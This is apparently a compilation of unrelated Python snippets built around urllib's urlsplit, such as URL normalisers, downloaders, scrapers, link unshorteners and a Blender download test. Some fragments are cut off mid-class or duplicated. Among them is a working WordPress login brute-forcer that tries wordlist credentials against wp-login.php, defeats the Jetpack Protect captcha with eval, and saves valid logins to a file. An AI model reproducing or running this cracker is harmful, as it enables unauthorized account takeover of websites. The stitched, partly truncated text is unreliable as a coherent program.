def normalize_url(url, base_url=None):
    """
    Returns a normalized URL. If the URL scheme is missing, the 'file' scheme is set.

    :param url: A relative or absolute URL.
    :param base_url: A reference base URL to join.
    :return: A normalized URL.
    """
    url_parts = urlsplit(url)
    if url_parts.scheme and url_parts.scheme in uses_relative:
        return url_parts.geturl()
    elif base_url is None:
        pathname = os.path.abspath(url_parts.geturl())
        return urljoin(u'file:', pathname2url(pathname))
    else:
        base_url_parts = urlsplit(base_url)
        if base_url_parts.scheme and base_url_parts.scheme in uses_relative:
            return urlunsplit((
                base_url_parts.scheme,
                base_url_parts.netloc,
                os.path.join(base_url_parts.path, pathname2url(url)),
                base_url_parts.query,
                base_url_parts.fragment,
            ))
        else:
            pathname = os.path.abspath(os.path.join(base_url, url))
            url_parts = urlsplit(pathname2url(pathname))
            if url_parts.scheme and url_parts.scheme in uses_relative:
                return url_parts.geturl()
            else:
                return urljoin(u'file:', url_parts.geturl())
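A minimal usage sketch, assuming normalize_url above is defined together with the imports it relies on (os, plus urlsplit, urljoin, urlunsplit and uses_relative from urllib.parse, and pathname2url from urllib.request); the example URLs are illustrative only.

import os
from urllib.parse import urlsplit, urljoin, urlunsplit, uses_relative
from urllib.request import pathname2url

print(normalize_url('https://example.com/schema.xsd'))
# scheme present and in uses_relative: returned unchanged
print(normalize_url('schema.xsd'))
# no scheme, no base: becomes a file:// URL relative to the current directory
print(normalize_url('schema.xsd', 'https://example.com/xsd/'))
# joined onto the base URL: https://example.com/xsd/schema.xsd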
from os import pathsep
from urllib import request as req  # assumed alias; urllib.request re-exports urlsplit


def print_some_url(url, return_string=True):
    message = f"hello{pathsep * 2}human"
    loc = req.urlsplit(url).netloc
    output = f"{message}, welcome to {loc}"
    print(output)
    if return_string:
        return output
def load_resource(url):
    """
    Load a resource from a URL, decoding it into a UTF-8 string.

    :param url: The resource URL.
    :return: The resource as a unicode string and the loaded URL.
    """
    msg = "cannot load resource from %r: %s"
    try:
        source = urlopen(normalize_url(url))
    except URLError as err:
        raise XMLSchemaURLError(reason=msg % (url, err.reason))
    else:
        try:
            data = source.read()
        except (OSError, IOError) as err:
            raise XMLSchemaOSError(msg % (url, err))
        finally:
            source.close()

    if PY3:
        try:
            return data.decode('utf-8'), url
        except UnicodeDecodeError:
            return data.decode('iso-8859-1'), url
    else:
        try:
            return data.encode('utf-8'), url
        except UnicodeDecodeError:
            import codecs
            with codecs.open(urlsplit(url).path, mode='rb',
                             encoding='iso-8859-1') as text_file:
                return text_file.read().encode('iso-8859-1'), url
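A hedged usage sketch, assuming load_resource and the XMLSchema* exception classes it raises are defined in the same module as the snippet above; the URL is illustrative only.

# Hypothetical call; load_resource, XMLSchemaURLError and XMLSchemaOSError come
# from the surrounding module, not from this example.
try:
    text, loaded_url = load_resource('https://www.w3.org/2001/xml.xsd')
    print(loaded_url, len(text))
except (XMLSchemaURLError, XMLSchemaOSError) as err:
    print('failed to load:', err)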
def wait(self, url):
    domain = urlsplit(url).netloc
    last_accessed = self.domains.get(domain)
    if self.delay > 0 and last_accessed is not None:
        sleep_secs = self.delay - (datetime.now() - last_accessed).seconds
        if sleep_secs > 0:
            time.sleep(sleep_secs)
    self.domains[domain] = datetime.now()
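A minimal, self-contained sketch of how a wait method like the one above is typically wrapped in a per-domain throttle; the Throttle class name and constructor are assumptions, not taken from the original.

import time
from datetime import datetime
from urllib.parse import urlsplit


class Throttle:
    """Hypothetical wrapper: delay successive requests to the same domain."""

    def __init__(self, delay):
        self.delay = delay    # minimum seconds between hits on one domain
        self.domains = {}     # domain -> datetime of last access

    def wait(self, url):
        domain = urlsplit(url).netloc
        last_accessed = self.domains.get(domain)
        if self.delay > 0 and last_accessed is not None:
            sleep_secs = self.delay - (datetime.now() - last_accessed).seconds
            if sleep_secs > 0:
                time.sleep(sleep_secs)
        self.domains[domain] = datetime.now()


throttle = Throttle(delay=2)
for link in ['https://example.com/a', 'https://example.com/b']:
    throttle.wait(link)  # sleeps ~2s before the second hit on example.com
    # the actual fetch of `link` would go here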
from operator import attrgetter, itemgetter
from urllib.parse import urlsplit, urlparse


def query_splitter(url):
    from attrdict import AttrDict
    from collections import OrderedDict

    query = attrgetter('query')(urlsplit(url))
    dic = urlparse(url)._asdict()
    _query = itemgetter('query')(dic)
    print(OrderedDict([q.split('=') for q in _query.split('&')])['text'])
    return AttrDict(OrderedDict([q.split('=') for q in query.split('&')]))
def url_to_path(self, url):
    components = urlsplit(url)
    path = components.path
    # The URL path may be empty, e.g. everything after ".com/"
    if not path:
        path = '/index.html'
    elif path.endswith('/'):
        path += 'index.html'
    filename = components.netloc + path + components.query
    # The filename may contain characters the filesystem does not support,
    # such as "*" or ">", so replace them.
    filename = re.sub(r'[^0-9a-zA-Z\-.,;_]', '_', filename)
    return os.path.join(self.cache_dir, filename)
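A quick illustration of the mapping, assuming the function above is defined at module level; the DiskCache class here is a hypothetical stand-in for whatever object normally provides cache_dir.

import os
import re
from urllib.parse import urlsplit


class DiskCache:
    """Hypothetical holder providing the cache_dir attribute the method expects."""

    def __init__(self, cache_dir='cache'):
        self.cache_dir = cache_dir


cache = DiskCache()
# Call the function above explicitly, passing the instance as `self`.
print(url_to_path(cache, 'http://example.com/blog/?page=2'))
# -> something like 'cache/example.com_blog_index.htmlpage_2'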
def crack(self):
    print('%s\t[info]%s total site: %d' % (h, p, len(self.site)))
    print('%s\t[info]%s total wordlist u/p: %d' % (h, p, min([len(self.a), len(self.b)])))
    for site in self.site:
        # build per-request headers; the requests module has no global headers attribute
        headers = {'user-agent': random.choice(ua)}
        parse = urlsplit(site)
        netloc = parse.netloc
        scheme = parse.scheme
        print('%s[info]%s cracking: %s' % (br, p, netloc))
        for a, b in zip(self.a, self.b):
            try:
                data = {}
                url = '%s://%s/wp-login.php' % (scheme, netloc)
                cek = requests.get(url, headers=headers)
                if cek.status_code != 200:
                    print('%s[info]%s path wp-login not found ' % (m, p))
                    continue
                for c, d in re.findall(r'name="(.*?)".*?value="(.*?)"', cek.text):
                    data.update({c: d})
                if 'jetpack_protect_num' in cek.text.lower():
                    info = re.findall(r'\n\t\t\t\t\t(.*?)=.*?\t\t\t\t', cek.text)[0].split(' ')
                    iok = (''.join(info)).replace('x', '*').replace(' ', '')
                    value = str(eval(iok))
                    print('%s[info]%s suspicious user detected!' % (m, p))
                    print('%s[info]%s bypassing captcha %s = %s%s' % (m, p, iok, h, value))
                    data.update({'jetpack_protect_num': value})
                data.update({'log': a, 'pwd': b})
                req = requests.post(url, data=data, headers=headers).text.lower()
                if 'dashboard' in req:
                    self.v += 1
                    print(' %s[Success] %s: %s > %s , %s' % (h, p, url, a, b))
                    open('found.txt', 'a').write(url + '> %s | %s \n' % (a, b))
                    break
                else:
                    print(' %s[Failed] %s%s , %s' % (m, p, a, b))
                    continue
            except Exception:
                print('%s[info] %serror, skipping ..' % (m, p))
                continue
    quit('%s[%s@%s]%s finished, total %s saved to found.txt' % (br, m, br, p, self.v))
def download(url, path="./"):
    # Check if the download dir exists
    if not os.path.isdir(path):
        os.mkdir(path)
    # Download the file from `url` and save it locally under `file_name`:
    split = urlsplit(url)
    file_name = split.path.split("/")[-1]
    path = path + file_name
    if not os.path.isfile(path):
        file_name, headers = urlretrieve(url, path, reporthook=reporthook)
        print("\nDownload complete!")
    return path
def down_parse_html(url):
    """
    download html and parse it with lxml.html

    :param url: string
    :return: lxml html parsed document
    """
    request = urlopen(Request(url, headers={
        'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:10.0.1) '
                      'Gecko/20100101 Firefox/10.0.1'}))
    encoding = request.headers.get_content_charset()
    data = request.read().decode(encoding if encoding else 'utf-8')
    doc = html.fromstring(data)
    doc.make_links_absolute('{0.scheme}://{0.netloc}'.format(urlsplit(url)))
    return doc
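A minimal usage sketch, assuming down_parse_html above is in scope together with the imports it relies on; the target URL is illustrative only.

from urllib.request import urlopen, Request
from urllib.parse import urlsplit
from lxml import html

doc = down_parse_html('https://example.com/')
# Links are already absolute thanks to make_links_absolute()
for href in doc.xpath('//a/@href')[:5]:
    print(href)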
def __download_file(self, name, libname, url, download_path):
    # try to detect an already downloaded file
    (version, exists) = self.__detect_existing_download(libname, download_path)
    if not exists:
        # download new local version
        try:
            # urlgrabber follows redirects better than using urllib directly
            local_file = urlgrabber.urlopen(url)  # use urlgrabber to open the url
            actual_url = local_file.url  # detects the actual url after redirects
            values = urlsplit(actual_url)  # split the url up into bits
            filepath = Path(values[2])  # part 2 is the path section of the url (already str)
            filename = filepath.name  # just extract the file name
        except urlgrabber.grabber.URLGrabError as error:
            self.print_message(str(error))
        self.print_message(
            _('Started downloading {}').format(download_path, filename))
        download_file = download_path / filename
        extract_path = self.download_path / name
        extract_path.mkdir(parents=True, exist_ok=True)
        self.__download_remote_file(local_file, download_file)
        self.__decompress(filename, download_file, download_path, extract_path)
        self.print_message(_('Completed download of {}.').format(filename))
    else:
        # check the existing local version against the download version
        (f_major, f_minor, f_build) = self.__detect_library_version(version)
        (d_major, d_minor, d_build) = self.__detect_download_version(filename)
        if (d_major > f_major or d_minor > f_minor or d_build > f_build):
            # download a replacement if newer
            self.print_message(
                _('Started downloading {} to replace earlier version').format(
                    download_path, filename))
            download_file = download_path / filename
            extract_path = self.download_path / name
            extract_path.mkdir(parents=True, exist_ok=True)
            self.__download_remote_file(local_file, download_file)
            self.__decompress(filename, download_file, download_path, extract_path)
            self.print_message(
                _('Completed download of {} of replacement version.').format(filename))
def unshorten(self, uri, type=None, timeout=10):
    domain = urlsplit(uri).netloc
    self._timeout = timeout

    if not domain:
        return uri, INVALID_URL_ERROR_CODE

    if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == 'adfly':
        return self._unshorten_adfly(uri)
    if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type == 'adfocus':
        return self._unshorten_adfocus(uri)
    if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == 'linkbucks':
        if linkbucks_support:
            return self._unshorten_linkbucks(uri)
        else:
            return uri, 'linkbucks.com not supported. Install selenium package to add support.'
    if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == 'lnxlu':
        return self._unshorten_lnxlu(uri)
    if re.search(self._shst_regex, domain, re.IGNORECASE):
        return self._unshorten_shst(uri)
    if re.search(self._hrefli_regex, domain, re.IGNORECASE):
        return self._unshorten_hrefli(uri)
    if re.search(self._anonymz_regex, domain, re.IGNORECASE):
        return self._unshorten_anonymz(uri)

    try:
        # headers stop t.co from working so omit headers if this is a t.co link
        if domain == 't.co':
            r = requests.get(uri, timeout=self._timeout)
            return r.url, r.status_code
        # p.ost.im uses meta http refresh to redirect.
        if domain == 'p.ost.im':
            r = requests.get(uri, headers=self._headers, timeout=self._timeout)
            uri = re.findall(r'.*url\=(.*?)\"\.*', r.text)[0]
            return uri, 200
        try:
            r = requests.head(uri, headers=self._headers, timeout=self._timeout)
        except (requests.exceptions.InvalidSchema, requests.exceptions.InvalidURL):
            return uri, -1
        else:
            while True:
                if 'location' in r.headers:
                    r = requests.head(r.headers['location'])
                    uri = r.url
                else:
                    return r.url, r.status_code
    except Exception as e:
        return uri, str(e)
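The fallback branch above boils down to chasing Location headers with HEAD requests. A standalone sketch of that loop, under the assumption that requests is available; the function name, the max_hops guard and the short link are illustrative additions, not part of the original.

import requests


def follow_redirects(uri, timeout=10, max_hops=10):
    """Resolve a short link by following Location headers with HEAD requests."""
    r = requests.head(uri, timeout=timeout)
    for _ in range(max_hops):
        if 'location' not in r.headers:
            break
        uri = r.headers['location']
        r = requests.head(uri, timeout=timeout)
    return uri, r.status_code

# print(follow_redirects('https://t.co/example'))  # illustrative short link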
def unshorten(self, uri, type=None, timeout=10):
    domain = urlsplit(uri).netloc
    self._timeout = timeout

    if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == 'adfly':
        return self._unshorten_adfly(uri)
    if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type == 'adfocus':
        return self._unshorten_adfocus(uri)
    if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == 'linkbucks':
        if linkbucks_support:
            return self._unshorten_linkbucks(uri)
        else:
            return uri, 'linkbucks.com not supported. Install selenium package to add support.'
    if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == 'lnxlu':
        return self._unshorten_lnxlu(uri)
    if re.search(self._shst_regex, domain, re.IGNORECASE):
        return self._unshorten_shst(uri)

    try:
        # headers stop t.co from working so omit headers if this is a t.co link
        if domain == 't.co':
            r = requests.get(uri, timeout=self._timeout)
            return r.url, r.status_code
        # p.ost.im uses meta http refresh to redirect.
        if domain == 'p.ost.im':
            r = requests.get(uri, headers=self._headers, timeout=self._timeout)
            uri = re.findall(r'.*url\=(.*?)\"\.*', r.text)[0]
            return uri, 200
        r = requests.head(uri, headers=self._headers, timeout=self._timeout)
        while True:
            if 'location' in r.headers:
                r = requests.head(r.headers['location'])
                uri = r.url
            else:
                return r.url, r.status_code
    except Exception as e:
        return uri, str(e)
def __init__(self, base, auth=None):
    self.auth = auth
    self.headers = {'User-Agent': 'foobar'}
    self.context = init_ssl()
    self.jar = CookieJar()
    split = urlsplit(base)
    self.base = '{}://{}'.format(split.scheme, split.netloc)
    if self.auth:
        auth = ':'.join(self.auth)
        if sys.version_info >= (3,):
            basic = base64.b64encode(auth.encode('ascii')).decode('ascii')
        else:
            basic = base64.b64encode(auth)
        self.headers['Authorization'] = 'Basic {}'.format(basic)
    self._get_crumb()
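For context, a standalone sketch of the Basic auth header construction used above; the credentials are illustrative only.

import base64

user, password = 'alice', 's3cret'  # illustrative credentials
token = base64.b64encode(f'{user}:{password}'.encode('ascii')).decode('ascii')
headers = {'Authorization': 'Basic {}'.format(token)}
print(headers)  # {'Authorization': 'Basic YWxpY2U6czNjcmV0'}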
def connect(url: str) -> tuple:
    """
    Connect to the given url and extract the html.

    :param url:
    """
    year = urlsplit(url).netloc.split('.')[0]
    try:
        headers = dict()
        headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 " \
                                "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req) as response:
            page = codecs.decode(response.read())
        return page, int(year)
    except urllib.request.URLError as e:
        print(f"The following error was raised while trying to connect to {url}\n")
        print(e)
        sys.exit()
def isNeededUrl(url):
    neededUrl = True
    fileName = (urlsplit(url).path.lower().split("/"))[-1]
    if fileName in comm.undesiredFileName:
        neededUrl = False
    if neededUrl:
        extSplit = fileName.split(".")
        lastIndex = len(extSplit) - 1
        if lastIndex > 0:
            extension = extSplit[lastIndex]
            if extension in comm.undesiredFileExtensions:
                neededUrl = False
    if neededUrl:
        for udft in comm.undesiredFileTypes:
            if udft in url:
                neededUrl = False
                break
    return neededUrl
def checkcrolling(url):
    urlspli = request.urlsplit(url)
    netloc = urlspli.netloc
    path = urlspli.path
    robots = urlspli.scheme + "://" + netloc + "/robots.txt"
    response = request.urlopen(robots)
    wrapper = io.TextIOWrapper(response, 'utf-8')
    read = wrapper.read()
    if read.startswith("User-agent"):
        disallowlist = [
            string[string.index(":") + 1::].strip(" ")
            for string in read.split("\n")
            if string.startswith("Disallow")
        ]
        disallowlist.append("/")
        if "/" in disallowlist:
            return False
        return path in disallowlist
    else:
        return False
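For comparison, the standard library already ships a robots.txt parser; a minimal sketch using urllib.robotparser (not part of the original snippet), with an illustrative URL.

from urllib.parse import urlsplit
from urllib.robotparser import RobotFileParser


def can_fetch(url, user_agent='*'):
    """Check a URL against its site's robots.txt using the stdlib parser."""
    parts = urlsplit(url)
    rp = RobotFileParser(f"{parts.scheme}://{parts.netloc}/robots.txt")
    rp.read()
    return rp.can_fetch(user_agent, url)

# print(can_fetch('https://www.python.org/search/'))  # illustrative URL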
def redirected(self, req, fp, code, msg, headers):
    note.yellow("being redirected", code, msg, headers.get("location"))
    note(headers)
    if 'set-cookie' in headers:
        import time
        parts = headers['set-cookie'].split(";")
        n, v = parts[0].split("=", 1)
        url = urllib.urlsplit(req.url)
        c = {
            'name': n.strip(),
            'value': v.strip(),
            'domain': split_port(url.netloc)[1],
            'creationTime': time.time()
        }
        for part in parts[1:]:
            part = part.split("=", 1)
            if len(part) == 1:
                c[part[0].strip()] = True
            else:
                c[part[0].strip()] = part[1].strip()
        jar.set_cookie(c)
def unshorten(self, uri, type=None, timeout=10):
    domain = urlsplit(uri).netloc
    self._timeout = timeout

    if re.search(self._adfly_regex, domain, re.IGNORECASE) or type == "adfly":
        return self._unshorten_adfly(uri)
    if re.search(self._adfocus_regex, domain, re.IGNORECASE) or type == "adfocus":
        return self._unshorten_adfocus(uri)
    if re.search(self._linkbucks_regex, domain, re.IGNORECASE) or type == "linkbucks":
        if linkbucks_support:
            return self._unshorten_linkbucks(uri)
        else:
            return uri, "linkbucks.com not supported. Install selenium package to add support."
    if re.search(self._lnxlu_regex, domain, re.IGNORECASE) or type == "lnxlu":
        return self._unshorten_lnxlu(uri)
    if re.search(self._shst_regex, domain, re.IGNORECASE):
        return self._unshorten_shst(uri)

    try:
        # headers stop t.co from working so omit headers if this is a t.co link
        if domain == "t.co":
            r = requests.get(uri, timeout=self._timeout)
            return r.url, r.status_code
        # p.ost.im uses meta http refresh to redirect.
        if domain == "p.ost.im":
            r = requests.get(uri, headers=self._headers, timeout=self._timeout)
            uri = re.findall(r".*url\=(.*?)\"\.*", r.text)[0]
            return uri, 200
        r = requests.head(uri, headers=self._headers, timeout=self._timeout)
        while True:
            if "location" in r.headers:
                r = requests.head(r.headers["location"])
                uri = r.url
            else:
                return r.url, r.status_code
    except Exception as e:
        return uri, str(e)
def url2name(url):
    return basename(urlsplit(url)[2])
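A quick check of what url2name returns, assuming basename comes from os.path and urlsplit from urllib.parse; the URL is illustrative.

from os.path import basename
from urllib.parse import urlsplit

print(url2name('https://example.com/files/report.pdf?dl=1'))  # -> 'report.pdf'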
import os
from argparse import ArgumentParser
from struct import pack
from urllib.parse import urlsplit
from urllib.request import urlopen

from tqdm import tqdm

import aigym.dataset
from aigym.conf.settings import RAW_DATASETS_DIR

arg_parser = ArgumentParser('aigym.dataset')
arg_parser.add_argument('-download', metavar='url',
                        help="download dataset file from url")
arg_parser.add_argument('-prepare', metavar='dataset name',
                        help="prepares dataset specified by name")
parsed_args = arg_parser.parse_args()

if parsed_args.download:
    source = urlopen(parsed_args.download)
    filename = os.path.split(urlsplit(parsed_args.download).path)[-1]
    with open(os.path.join(RAW_DATASETS_DIR, filename), 'wb') as file:
        for byte in tqdm(source.read(),
                         desc='Downloading from {}'.format(parsed_args.download)):
            file.write(pack('B', byte))

if parsed_args.prepare:
    cls = getattr(aigym.dataset,
                  "{}RawDataset".format(parsed_args.prepare.title()), None)
    if cls is not None:
        cls().prepare()
def basename(self) -> str:
    return Path(request.urlsplit(self._url)[2]).name
FILE c:\python37\lib\urllib\__init__.py

>>> import urllib2
Traceback (most recent call last):
  File "<pyshell#10>", line 1, in <module>
    import urllib2
ModuleNotFoundError: No module named 'urllib2'
>>> import urllib.request as request
>>> dir(request)
['AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler', 'ContentTooShortError', 'DataHandler', 'FTPHandler', 'FancyURLopener', 'FileHandler', 'HTTPBasicAuthHandler', 'HTTPCookieProcessor', 'HTTPDefaultErrorHandler', 'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor', 'HTTPHandler', 'HTTPPasswordMgr', 'HTTPPasswordMgrWithDefaultRealm', 'HTTPPasswordMgrWithPriorAuth', 'HTTPRedirectHandler', 'HTTPSHandler', 'MAXFTPCACHE', 'OpenerDirector', 'ProxyBasicAuthHandler', 'ProxyDigestAuthHandler', 'ProxyHandler', 'Request', 'URLError', 'URLopener', 'UnknownHandler', '__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', '__version__', '_cut_port_re', '_ftperrors', '_have_ssl', '_localhost', '_noheaders', '_opener', '_parse_proxy', '_proxy_bypass_macosx_sysconf', '_randombytes', '_safe_gethostbyname', '_thishost', '_url_tempfiles', 'addclosehook', 'addinfourl', 'base64', 'bisect', 'build_opener', 'contextlib', 'email', 'ftpcache', 'ftperrors', 'ftpwrapper', 'getproxies', 'getproxies_environment', 'getproxies_registry', 'hashlib', 'http', 'install_opener', 'io', 'localhost', 'noheaders', 'os', 'parse_http_list', 'parse_keqv_list', 'pathname2url', 'posixpath', 'proxy_bypass', 'proxy_bypass_environment', 'proxy_bypass_registry', 'quote', 're', 'request_host', 'socket', 'splitattr', 'splithost', 'splitpasswd', 'splitport', 'splitquery', 'splittag', 'splittype', 'splituser', 'splitvalue', 'ssl', 'string', 'sys', 'tempfile', 'thishost', 'time', 'to_bytes', 'unquote', 'unquote_to_bytes', 'unwrap', 'url2pathname', 'urlcleanup', 'urljoin', 'urlopen', 'urlparse', 'urlretrieve', 'urlsplit', 'urlunparse', 'warnings']
>>> dir(urllib.response)
['__all__', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'addbase', 'addclosehook', 'addinfo', 'addinfourl', 'tempfile']
>>> url = "https://www.google.com"
>>> sp = request.urlsplit()
Traceback (most recent call last):
  File "<pyshell#15>", line 1, in <module>
    sp = request.urlsplit()
TypeError: urlsplit() missing 1 required positional argument: 'url'
>>> sp = request.urlsplit(url)
>>> sp
SplitResult(scheme='https', netloc='www.google.com', path='', query='', fragment='')
>>> sp[0]
'https'
>>> sp[1]
'www.google.com'
>>> sp[2]
''
>>> url1 = "https://stackoverflow.com/questions/34475051/need-to-install-urllib2-for-python-3-5-1"
>>> sp = request.urlsplit(url1)
def test_get_legacy_release_download_url(blender_version, operative_system, bits, arch):
    blender_Version = BlenderVersion(blender_version)

    if blender_Version < BlenderVersion(MINIMUM_VERSION_SUPPPORTED):
        mocked_stderr = io.StringIO()
        with pytest.raises(SystemExit):
            with contextlib.redirect_stderr(mocked_stderr):
                get_legacy_release_download_url(blender_version, operative_system,
                                                bits, arch)
        assert mocked_stderr.getvalue() == (
            "The minimum version supported by blender-downloader is"
            f" {MINIMUM_VERSION_SUPPPORTED}.\n")
        return

    url = get_legacy_release_download_url(blender_version, operative_system, bits, arch)

    expected_url_start = "https://download.blender.org/release/Blender"
    assert url.startswith(expected_url_start)

    major_minor_blender_version = re.sub(
        r"[a-zA-Z]", "", ".".join(blender_version.split(".")[:2]))

    def assert_url(url_end_schema):
        url_end = url_end_schema
        if "{blender_version}" in url_end:
            if "{bits}" in url_end:
                url_end = url_end.format(
                    blender_version=blender_version,
                    bits=bits,
                )
            else:
                url_end = url_end.format(blender_version=blender_version)
        if "{bits}" in url_end:
            url_end = url_end.format(bits=bits)
        assert url == (
            f"{expected_url_start}{major_minor_blender_version}/blender-{url_end}"
        )

    if operative_system == "macos":
        if blender_Version >= BlenderVersion("2.93"):
            if arch in ["x64", "arm64"]:
                assert_url(f"{blender_version}-macos-{arch}.dmg")
            else:
                assert_url("{blender_version}-macos-x64.dmg")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-macos-x64.dmg")
        elif blender_Version > BlenderVersion("2.79"):
            assert_url("{blender_version}-macOS.dmg")
        elif blender_Version == BlenderVersion("2.79"):
            assert_url("{blender_version}-macOS-10.6.tar.gz")
        elif blender_Version == BlenderVersion("2.71"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-j2k-fix-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-j2k-fix-x86_64.zip")
        elif blender_Version < BlenderVersion("2.60"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.5_x86_64.zip")
        elif blender_Version == BlenderVersion("2.60"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6_x86_64.zip")
        elif blender_Version < BlenderVersion("2.64"):
            if bits == 32:
                assert_url("{blender_version}-release-OSX_10.5_i386.zip")
            else:
                assert_url("{blender_version}-release-OSX_10.5_x86_64.zip")
        elif blender_Version < BlenderVersion("2.65"):
            if bits == 32:
                assert_url("{blender_version}-release-OSX_10.6_i386.zip")
            else:
                assert_url("{blender_version}-release-OSX_10.6_x86_64.zip")
        elif blender_Version < BlenderVersion("2.71"):
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-x86_64.zip")
        elif blender_Version < BlenderVersion("2.79"):
            assert_url("{blender_version}-OSX_10.6-x86_64.zip")
        else:  # BlenderVersion("2.71") < blender_Version < BlenderVersion("2.79")
            if bits == 32:
                assert_url("{blender_version}-OSX_10.6-i386.zip")
            else:
                assert_url("{blender_version}-OSX_10.6-x86_64.zip")
    elif operative_system == "windows":
        if blender_Version >= BlenderVersion("2.93"):
            assert_url("{blender_version}-windows-x64.zip")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-windows-x64.zip")
        elif blender_Version > BlenderVersion("2.80"):
            assert_url("{blender_version}-windows64.zip")
        elif blender_Version > BlenderVersion("2.65"):
            assert_url("{blender_version}-windows{bits}.zip")
        elif blender_Version > BlenderVersion("2.60"):
            assert_url("{blender_version}-release-windows{bits}.zip")
        else:  # blender_Version < BlenderVersion("2.61")
            assert_url("{blender_version}-windows{bits}.zip")
    else:  # operative_system == "linux"
        if blender_Version >= BlenderVersion("2.93"):
            assert_url("{blender_version}-linux-x64.tar.xz")
        elif blender_Version >= BlenderVersion(
                "2.83.14") and blender_Version < BlenderVersion("2.84"):
            assert_url("{blender_version}-linux-x64.tar.xz")
        elif blender_Version > BlenderVersion("2.81"):
            assert_url("{blender_version}-linux64.tar.xz")
        elif blender_Version == BlenderVersion("2.81"):
            assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2")
        elif blender_Version == BlenderVersion("2.80"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc224-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc217-x86_64.tar.bz2")
        elif blender_Version == BlenderVersion("2.79"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc219-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc219-x86_64.tar.bz2")
        elif blender_Version < BlenderVersion("2.65"):
            if bits == 32:
                assert_url("{blender_version}-linux-glibc27-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc27-x86_64.tar.bz2")
        else:  # BlenderVersion("2.64") < blender_Version < BlenderVersion("2.79")
            if bits == 32:
                assert_url("{blender_version}-linux-glibc211-i686.tar.bz2")
            else:
                assert_url("{blender_version}-linux-glibc211-x86_64.tar.bz2")

    # check that the filetype is supported for extraction
    extension = os.path.splitext(os.path.basename(urlsplit(url).path))[1]
    assert extension in SUPPORTED_EXTENSIONS_FOR_EXTRACTION
            return True
        if self.index > other.index:
            return True
        return False

    def __eq__(self, other):
        if self.index == other.index:
            return True


file_info_list = []
input_json = input()
parsed_json = json.loads(input_json)

i = 0
for element in parsed_json:
    url = element["url"]
    split_result = request.urlsplit(url)
    file_name = split_result[2]
    if file_name == "/":
        file_name = "index.html"
    file_info_list.append(FileInfo(url, file_name, i))
    i += 1

file_info_list.sort()

password = ""
for file_info in file_info_list:
    password += file_info.md5

print(password)
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlsplit

general = 'https://afteegypt.org/blocked-websites-list?lang=en'
afteegypt = requests.get(general)
parse = BeautifulSoup(afteegypt.content, "html5lib")
blocked_websites = []

for table in parse.find_all('table'):
    for tr in table.findAll('tr', attrs={'style': 'height: 26px;'}):
        for anchor in tr.findAll('a'):
            url = urlsplit(anchor.get('href')).netloc
            blocked_websites.append(url)
    # Second half of the tables
    for td1 in table.findAll(
            'td',
            attrs={
                'style': 'background-color: #faf2f2; text-align: center; height: 26px; width: 214px;',
                'colspan': '2'
            }):
        v = td1.renderContents()
        for x in str(v.decode('utf-8')).replace('<br/>', '').split():
            blocked_websites.append(x)
# First half of the tables
def normalize(uri):
    return urlsplit(uri).geturl()
def download_release(download_url, output_directory, quiet=False):
    """Downloads the release file from the official Blender repository.

    Parameters
    ----------
    download_url : str
        URL of the file to download.

    output_directory : str
        Path to the directory in which the downloaded file will be stored.
    """
    try:
        # get filename of downloaded file (maybe a zip, maybe a dmg...)
        output_filename = os.path.basename(urlsplit(download_url).path)
        output_filepath = os.path.join(output_directory, output_filename)
        if os.path.isfile(output_filepath):
            sys.stderr.write(
                f"There is already a file named '{output_filename}' in the"
                " directory in which Blender will be downloaded.\nPlease, remove"
                " the file before executing blender-downloader.\n")
            sys.exit(1)

        # create the temporary blender-downloader directory if it does not
        # exist, to store extracted files
        if not os.path.isdir(TEMPDIR):
            os.mkdir(TEMPDIR)
        tmp_output_filepath = os.path.join(TEMPDIR, output_filename)

        chunksize = 8192
        downloaded_size = chunksize
        res = urlopen(Request(download_url))
        total_size_bits = int(res.info()["Content-Length"])

        progress_bar_kwargs = dict(
            total=total_size_bits,
            unit="B",
            desc=f"Downloading '{output_filename}'",
            unit_scale=True,
            unit_divisor=1000,
            miniters=1,
            disable=quiet,
            initial=chunksize,  # first chunk is written before entering the while loop
        )
        with tqdm(**progress_bar_kwargs) as progress_bar, open(
                tmp_output_filepath, "wb") as f:
            data = res.read(chunksize)
            f.write(data)
            while data:
                data = res.read(chunksize)
                f.write(data)
                progress_bar.update(chunksize)
                downloaded_size += chunksize
                if downloaded_size >= total_size_bits:
                    break
    except KeyboardInterrupt:
        sys.stderr.write("Download interrupted\n")
        if os.path.isfile(tmp_output_filepath):
            os.remove(tmp_output_filepath)
        sys.exit(1)

